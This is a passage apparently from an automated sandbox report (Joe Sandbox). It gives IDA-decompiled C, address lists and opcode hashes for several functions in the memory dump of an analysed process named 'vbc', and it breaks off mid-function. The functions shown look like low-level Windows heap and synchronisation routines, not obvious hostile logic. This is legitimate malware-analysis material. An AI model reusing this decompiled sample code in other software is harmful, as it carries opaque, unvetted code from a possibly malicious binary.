                                                  0x015ee807
                                                  0x015ee7ae
                                                  0x015ee7ae
                                                  0x015ee7b1
                                                  0x015ee7b4
                                                  0x015ee7b9
                                                  0x015ee7c0
                                                  0x015ee7c4
                                                  0x015ee7ca
                                                  0x015ee7cc
                                                  0x00000000
                                                  0x015ee7d3
                                                  0x015ee7d6
                                                  0x00000000
                                                  0x00000000
                                                  0x015ee7ff
                                                  0x015ee802
                                                  0x00000000
                                                  0x00000000
                                                  0x015ee7f9
                                                  0x015ee7fc
                                                  0x00000000
                                                  0x00000000
                                                  0x015ee7f3
                                                  0x015ee7f6
                                                  0x00000000
                                                  0x00000000
                                                  0x015ee7ed
                                                  0x015ee7f0
                                                  0x00000000
                                                  0x00000000
                                                  0x015ee7e7
                                                  0x015ee7ea
                                                  0x00000000
                                                  0x00000000
                                                  0x0162b685
                                                  0x0162b688
                                                  0x00000000
                                                  0x00000000
                                                  0x0162b682
                                                  0x00000000
                                                  0x00000000
                                                  0x015ee7cc
                                                  0x015ee7d9
                                                  0x015ee7dc
                                                  0x015ee7de
                                                  0x015ee7de
                                                  0x015ee7ac
                                                  0x015ee7e4
                                                  0x015ee74b
                                                  0x015ee751
                                                  0x015ee759
                                                  0x015ee761
                                                  0x015ee761

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e7742534186b93d81bcc2a948f093731c7606878cf43308a6153fca2f21dbadb
                                                  • Instruction ID: 202d9bfb58ce4e8f503365b8d4247c7cc7420e05340df8f8946f6662986e2dd8
                                                  • Opcode Fuzzy Hash: e7742534186b93d81bcc2a948f093731c7606878cf43308a6153fca2f21dbadb
                                                  • Instruction Fuzzy Hash: 9F318DB5A5424AEFD708CF58C845B9ABBE4FB09314F14865AFA04CB341D631EC80CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015EBC2C Relevance: .1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E015EBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x16a6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E015D2280(0xd, 0x713f1a0);
				_t41 =  *0x16a60f8; // 0x0
				if(_t41 != 0) {
					 *0x16a60f8 =  *_t41;
					 *0x16a60fc =  *0x16a60fc + 0xffff;
				}
				E015CFFB0(_t41, 0x800, 0x713f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x16a60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L015D4620(0x16a6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x16a6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                  0x015ebc36
                                                  0x015ebc42
                                                  0x015ebc45
                                                  0x015ebc4a
                                                  0x015ebd35
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015ebc50
                                                  0x015ebc50
                                                  0x015ebc58
                                                  0x015ebc5a
                                                  0x015ebc60
                                                  0x00000000
                                                  0x00000000
                                                  0x0162a4f2
                                                  0x0162a4f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0162a4fc
                                                  0x015ebc79
                                                  0x015ebc7e
                                                  0x015ebc86
                                                  0x015ebd16
                                                  0x015ebd20
                                                  0x015ebd20
                                                  0x015ebc8d
                                                  0x015ebc94
                                                  0x015ebcbd
                                                  0x015ebcca
                                                  0x015ebccb
                                                  0x015ebccc
                                                  0x015ebccd
                                                  0x015ebcce
                                                  0x015ebcd4
                                                  0x015ebcea
                                                  0x015ebcee
                                                  0x015ebcf2
                                                  0x015ebd00
                                                  0x015ebd04
                                                  0x00000000
                                                  0x015ebc96
                                                  0x015ebcab
                                                  0x015ebcaf
                                                  0x015ebd2c
                                                  0x015ebd2c
                                                  0x015ebd09
                                                  0x00000000
                                                  0x015ebd09
                                                  0x015ebcb1
                                                  0x015ebcb5
                                                  0x015ebcbb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015ebcbb

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 591ba90205eab9847934894df36b43247a6e63440439ba873a8d262b2f1d637c
                                                  • Instruction ID: a782f1792d83efac4fde7255ce57040db8e1e8070a0a2d4f916c272b84e06aea
                                                  • Opcode Fuzzy Hash: 591ba90205eab9847934894df36b43247a6e63440439ba873a8d262b2f1d637c
                                                  • Instruction Fuzzy Hash: 4331EC32A006169BCB22DF98C9807AA77B4FF18312F490479ED59DF206EA75E955CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015B9100 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E015B9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x168f6e8);
				E0160D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E016888F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0160D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x16a86c0; // 0x11507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x16a86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E015D2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E016888F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E015FAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x16ab1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x16a84c0;
										if(_t69 >=  *0x16a84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01689063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E015B922A(_t82);
							_t53 = E015D7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01688B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x16a86c0; // 0x11507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x16a86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x16a86bc;
										_t72 = 0x16a86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E015B9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x16a86c4;
									_t72 = 0x16a86c0;
									L18:
									E015E9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                  0x015b9100
                                                  0x015b9100
                                                  0x015b9100
                                                  0x015b9100
                                                  0x015b9102
                                                  0x015b9107
                                                  0x015b910c
                                                  0x015b9110
                                                  0x015b9115
                                                  0x015b9136
                                                  0x015b9143
                                                  0x016137e4
                                                  0x016137e4
                                                  0x015b9149
                                                  0x015b914e
                                                  0x015b914e
                                                  0x015b9117
                                                  0x015b911d
                                                  0x00000000
                                                  0x00000000
                                                  0x015b911f
                                                  0x015b9125
                                                  0x00000000
                                                  0x015b9151
                                                  0x015b9158
                                                  0x015b915d
                                                  0x015b9161
                                                  0x015b9168
                                                  0x01613715
                                                  0x00000000
                                                  0x015b916e
                                                  0x015b916e
                                                  0x015b9175
                                                  0x015b9177
                                                  0x015b917e
                                                  0x015b917f
                                                  0x015b9182
                                                  0x015b9182
                                                  0x015b9187
                                                  0x015b9187
                                                  0x015b918a
                                                  0x015b918d
                                                  0x015b918f
                                                  0x015b9192
                                                  0x015b9195
                                                  0x015b9198
                                                  0x015b9198
                                                  0x015b9198
                                                  0x015b919a
                                                  0x00000000
                                                  0x00000000
                                                  0x0161371f
                                                  0x01613721
                                                  0x01613727
                                                  0x0161372f
                                                  0x01613733
                                                  0x01613735
                                                  0x01613738
                                                  0x0161373b
                                                  0x0161373d
                                                  0x01613740
                                                  0x00000000
                                                  0x00000000
                                                  0x01613746
                                                  0x01613749
                                                  0x00000000
                                                  0x00000000
                                                  0x0161374f
                                                  0x01613751
                                                  0x00000000
                                                  0x00000000
                                                  0x01613757
                                                  0x01613759
                                                  0x0161375c
                                                  0x0161375c
                                                  0x0161375e
                                                  0x0161375e
                                                  0x01613761
                                                  0x01613764
                                                  0x00000000
                                                  0x00000000
                                                  0x01613766
                                                  0x01613768
                                                  0x016137a3
                                                  0x016137a3
                                                  0x016137a5
                                                  0x016137a7
                                                  0x016137ad
                                                  0x016137b0
                                                  0x016137b2
                                                  0x016137bc
                                                  0x016137c2
                                                  0x016137c2
                                                  0x016137b2
                                                  0x015b9187
                                                  0x015b9187
                                                  0x015b918a
                                                  0x015b918d
                                                  0x015b918f
                                                  0x015b9192
                                                  0x015b9195
                                                  0x00000000
                                                  0x015b9195
                                                  0x00000000
                                                  0x015b9187
                                                  0x0161376a
                                                  0x0161376a
                                                  0x0161376c
                                                  0x0161376c
                                                  0x0161376f
                                                  0x01613775
                                                  0x00000000
                                                  0x00000000
                                                  0x01613777
                                                  0x01613779
                                                  0x00000000
                                                  0x00000000
                                                  0x01613782
                                                  0x01613787
                                                  0x01613789
                                                  0x01613790
                                                  0x01613790
                                                  0x0161378b
                                                  0x0161378b
                                                  0x0161378b
                                                  0x01613792
                                                  0x01613795
                                                  0x01613795
                                                  0x01613798
                                                  0x01613798
                                                  0x0161379b
                                                  0x0161379b
                                                  0x015b91a3
                                                  0x015b91a9
                                                  0x015b91b0
                                                  0x015b91b4
                                                  0x015b91b4
                                                  0x015b91bb
                                                  0x015b91c0
                                                  0x015b91c5
                                                  0x015b91c7
                                                  0x016137da
                                                  0x015b91cd
                                                  0x015b91cd
                                                  0x015b91cd
                                                  0x015b91d2
                                                  0x015b91d5
                                                  0x015b9239
                                                  0x015b9239
                                                  0x015b91d7
                                                  0x015b91db
                                                  0x015b91e1
                                                  0x015b91e7
                                                  0x015b91fd
                                                  0x015b9203
                                                  0x015b921e
                                                  0x015b9223
                                                  0x00000000
                                                  0x015b9223
                                                  0x015b9205
                                                  0x015b9208
                                                  0x015b920c
                                                  0x015b9214
                                                  0x015b9214
                                                  0x015b91e9
                                                  0x015b91e9
                                                  0x015b91ee
                                                  0x015b91f3
                                                  0x015b91f3
                                                  0x015b91f3
                                                  0x015b91e7
                                                  0x00000000
                                                  0x015b91db
                                                  0x015b9187
                                                  0x015b9168

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8bf011ee116e783ae5d6ff40fd2ec68e652f56f8990779ec16cc89a92c223d6e
                                                  • Instruction ID: 0e1641a91fe62707d4771b06c80a2bfa09ce897fa4d101e445bf7a9c5e2c84d5
                                                  • Opcode Fuzzy Hash: 8bf011ee116e783ae5d6ff40fd2ec68e652f56f8990779ec16cc89a92c223d6e
                                                  • Instruction Fuzzy Hash: 52319EB1A046469FEB26DF6CC8C87EDBBB5BB98318F58814DD6056B342C330A980DB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E1DB5 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E015E1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E015DF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L015D4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E015DF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                  0x015e1dc2
                                                  0x015e1dc5
                                                  0x015e1dc7
                                                  0x015e1dcc
                                                  0x015e1dce
                                                  0x015e1dd6
                                                  0x015e1ddf
                                                  0x015e1de0
                                                  0x015e1de1
                                                  0x015e1de5
                                                  0x015e1de8
                                                  0x015e1def
                                                  0x015e1df0
                                                  0x015e1df6
                                                  0x015e1df7
                                                  0x015e1dfe
                                                  0x015e1e1a
                                                  0x00000000
                                                  0x00000000
                                                  0x015e1e0b
                                                  0x015e1e12
                                                  0x015e1e12
                                                  0x015e1e00
                                                  0x015e1e00
                                                  0x015e1e05
                                                  0x015e1e1e
                                                  0x015e1e23
                                                  0x0162570f
                                                  0x01625713
                                                  0x00000000
                                                  0x00000000
                                                  0x01625719
                                                  0x01625719
                                                  0x015e1e2c
                                                  0x015e1e2d
                                                  0x015e1e2e
                                                  0x015e1e2f
                                                  0x015e1e31
                                                  0x015e1e32
                                                  0x015e1e35
                                                  0x015e1e3d
                                                  0x01625723
                                                  0x0162573d
                                                  0x0162573d
                                                  0x00000000
                                                  0x01625723
                                                  0x015e1e49
                                                  0x015e1e4e
                                                  0x015e1e4e
                                                  0x015e1e09
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                  • Instruction ID: 79e558a3b9330ec81b1c4562504817285410adad7a6e2b33a95165cca9bc39fd
                                                  • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                  • Instruction Fuzzy Hash: DB216D72A00619EFD725CF99CC84EAABFF9FF85640F154455FA069B250D634AE01CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015D0050 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E015D0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x16ad360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E015E9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E015FB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01688A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E015E9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x16ab1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                  0x015d0055
                                                  0x015d005d
                                                  0x015d0062
                                                  0x015d006c
                                                  0x015d006f
                                                  0x015d0074
                                                  0x015d007a
                                                  0x015d007a
                                                  0x015d0080
                                                  0x015d0080
                                                  0x015d0087
                                                  0x015d008d
                                                  0x015d008f
                                                  0x015d0093
                                                  0x015d0095
                                                  0x015d009b
                                                  0x015d00f8
                                                  0x015d00fb
                                                  0x015d00fc
                                                  0x015d00ff
                                                  0x015d0108
                                                  0x015d0108
                                                  0x015d00a2
                                                  0x015d00a6
                                                  0x015d00b3
                                                  0x015d00bc
                                                  0x015d00c5
                                                  0x015d00ca
                                                  0x0161c01e
                                                  0x00000000
                                                  0x00000000
                                                  0x0161c02d
                                                  0x015d00d5
                                                  0x015d00d9
                                                  0x0161c03d
                                                  0x0161c046
                                                  0x0161c046
                                                  0x015d00df
                                                  0x015d00e2
                                                  0x015d00ea
                                                  0x015d00ef
                                                  0x015d00f2
                                                  0x015d00f6
                                                  0x015d0111
                                                  0x015d0117
                                                  0x015d0117
                                                  0x00000000
                                                  0x015d00f6
                                                  0x015d00d0
                                                  0x015d00d0
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3be495fb85fb116892d2893219871c50122cc8ecc84ac6c0fb3208f4d5cccb07
                                                  • Instruction ID: 42b349e42f5b5a2d92180a9055888c9f52c472360f9e82ecc4e2cb3e67a753db
                                                  • Opcode Fuzzy Hash: 3be495fb85fb116892d2893219871c50122cc8ecc84ac6c0fb3208f4d5cccb07
                                                  • Instruction Fuzzy Hash: B831CC31201B04DFD722CF2CC840B9AB7E5FF89314F14896DE5968BB90EB31A801CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01636C0A Relevance: .1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E01636C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E015D7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x16a7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L015D4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E015FF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E015D7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E015F9AE0();
						_t23 = L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                  0x01636c0a
                                                  0x01636c0f
                                                  0x01636c10
                                                  0x01636c13
                                                  0x01636c15
                                                  0x01636c19
                                                  0x01636c1c
                                                  0x01636c21
                                                  0x01636c28
                                                  0x01636c3a
                                                  0x01636c2a
                                                  0x01636c33
                                                  0x01636c33
                                                  0x01636c3f
                                                  0x01636c48
                                                  0x01636c4d
                                                  0x01636c60
                                                  0x01636c65
                                                  0x01636c69
                                                  0x01636c73
                                                  0x01636c79
                                                  0x01636c7f
                                                  0x01636c86
                                                  0x01636c90
                                                  0x01636c94
                                                  0x01636ca6
                                                  0x01636cb2
                                                  0x01636cbd
                                                  0x01636cbd
                                                  0x01636cc3
                                                  0x01636cc7
                                                  0x01636ccb
                                                  0x01636cd0
                                                  0x01636cd1
                                                  0x01636ce2
                                                  0x01636ce2
                                                  0x01636c69
                                                  0x01636ced

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f1303cf4b7cbbf645ca35631d0034c59738282ff63dd3880095cc6afc95d458
                                                  • Instruction ID: e86b0dbe6d6e29bc9215f0abfd2a3c22c458e2523f2644ec9df53756316b2368
                                                  • Opcode Fuzzy Hash: 2f1303cf4b7cbbf645ca35631d0034c59738282ff63dd3880095cc6afc95d458
                                                  • Instruction Fuzzy Hash: DE2188B2A00645ABD7219B6CDC80E2AB7A8FF88704F140069F905CBB90D734EA11CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F90AF Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E015F90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0160D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E015EE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L015D4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E015FF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
